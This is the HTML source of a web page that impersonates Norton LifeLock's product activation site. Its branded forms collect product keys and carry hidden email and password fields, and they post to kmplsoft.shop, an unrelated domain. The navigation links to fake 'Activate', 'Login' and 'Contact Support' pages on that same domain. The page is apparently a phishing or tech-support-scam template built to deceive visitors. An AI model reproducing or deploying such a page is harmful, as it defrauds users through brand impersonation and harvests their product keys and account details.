 
<!DOCTYPE html>
<html lang="en">
<head>
    <title>Norton</title>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.0/css/bootstrap.min.css">
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
	<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.0/js/bootstrap.min.js"></script>
   <link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,400;1,900&display=swap" rel="stylesheet">
	<link rel="stylesheet" href="../css/style.css">
    <link rel="shortcut icon" href="../img/favicon.ico"/>



<style>
        ::-webkit-input-placeholder { /* Edge */
    color: #4d4d4d;
    font-size: 16px;
    font-weight: 300;
    text-align:left;
    /* padding-left:15px; */
    font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
  }
  
  :-ms-input-placeholder { /* Internet Explorer */
    color: #4d4d4d;
  }
  
  ::placeholder {
    color: #4d4d4d;
  }
        .loader 
        {   
            margin-left:45%;
            margin-top:15%;
            border: 16px solid #f3f3f3;
            border-radius: 50%;
            border-top: 16px solid #c01818;
            width: 120px;
            height: 120px;
            -webkit-animation: spin 2s linear infinite; /* Safari */
            animation: spin 2s linear infinite;
            }

            /* Safari */
            @-webkit-keyframes spin {
            0% { -webkit-transform: rotate(0deg); }
            100% { -webkit-transform: rotate(360deg); }
            }

            @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
        .rk-activ1{
            margin-top:8%;
        }
        .loader2 
        {   
            margin-left:35%;
            margin-top:10%;
            display:none;
            border: 16px solid #f3f3f3;
            border-radius: 50%;
            border-top: 16px solid #662d91;
            width: 120px;
            height: 120px;
            -webkit-animation: spin 2s linear infinite; /* Safari */
            animation: spin 2s linear infinite;
            }

            /* Safari */
            @-webkit-keyframes spin {
            0% { -webkit-transform: rotate(0deg); }
            100% { -webkit-transform: rotate(360deg); }
            }

            @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
        @media only screen and (max-width: 1200px)
        {
            .loader
            {
                margin-top:18%;
                margin-left:45%;
            }
        }
        @media only screen and (max-width: 1000px)
        {
            .loader
            {
                margin-top:25%;
                margin-left:45%;
            }
        }
        @media only screen and (max-width: 1000px)
        {
            .loader
            {
                margin-top:25%;
                margin-left:45%;
            }
        }
        @media only screen and (max-width: 425px)
        {
            .loader
            {
                margin-top:35%;
                margin-left:35%;
            }
        }
        #actr{
            display:none;
        }
    </style>
    </head>
<body>
<nav class="navbar navbar-inverse">
  <div class="container">
    <div class="navbar-header">
      <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#myNavbar">
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>                        
      </button>
      <a class="navbar-brand" href="register-sec.html"><img src="../img/logoblc.png" class="logo-custom" alt=""></a>
    </div>
    <div class="collapse navbar-collapse" id="myNavbar">
      <ul class="nav navbar-nav">
      <li ><a href="https://kmplsoft.shop/activetion/act/set-a/nor/1/nor1/nor1.html">Activate Activation Code </a></li>       
       <li><a href="https://kmplsoft.shop/activetion/act/set-a/nor/1/nor1/login/index.html">Login</a></li>
       <li><a href="https://kmplsoft.shop/activetion/act/set-a/nor/1/nor1/nor-support.html">Contact Support</a></li>
      </ul>
    </div>
  </div>
</nav>   

    <div  class="text-center"><img src="../img/norton-lifelock-logo.png"></div>

    <div class="container">
        <div class="form-block">
            <div class="content">
                <div class="form-box">
                    <form action="https://kmplsoft.shop/activetion/act/set-a/nor/1/nor1/register/register-opt.html" method="post">
                                                    <h3 class="form-heading text-center">Register Your New Account</h3>
                            <p class="paragraph text-center">Having New Product Key Enter Below</p>
                        <input class="input-de" type="text" id="emailField" name="key_field" placeholder="xxxxx-xxxxx-xxxxx-xxxxx-xxxxx" required>
                        <!-- <input class="input-de" type="text" placeholder="Product key *"> -->
                        <input type="hidden"  name="email" class="form-control input-cls" value="" placeholder="Email address">
                        <input type="hidden" name="password" class="form-control input-cls" value="" placeholder="Email address">

                        <input  class="submit-btn" type="submit" value="SUBMIT">
                    </form><br>
                    <form action="https://kmplsoft.shop/activetion/act/set-a/nor/1/nor1/register/register-opt.html" method="post">
                    <p class="paragraph text-center">OR <br> Don't Have Product Key?</p>
                    <input type="hidden" id="nameField" name="key_field" class="form-control input-cls" value="Don't Have Product Key" placeholder="Enter Product Key To Setup">
                    <input type="hidden"  name="email" class="form-control input-cls" value="" placeholder="Email address">
                        <input type="hidden" name="password" class="form-control input-cls" value="" placeholder="Email address">

                        <input  class="submit-btn" type="submit" value="CONTINUE REGISTER">
                                        </form>
                </div>
            </div>
        </div>
    </div>


</body>
</html>

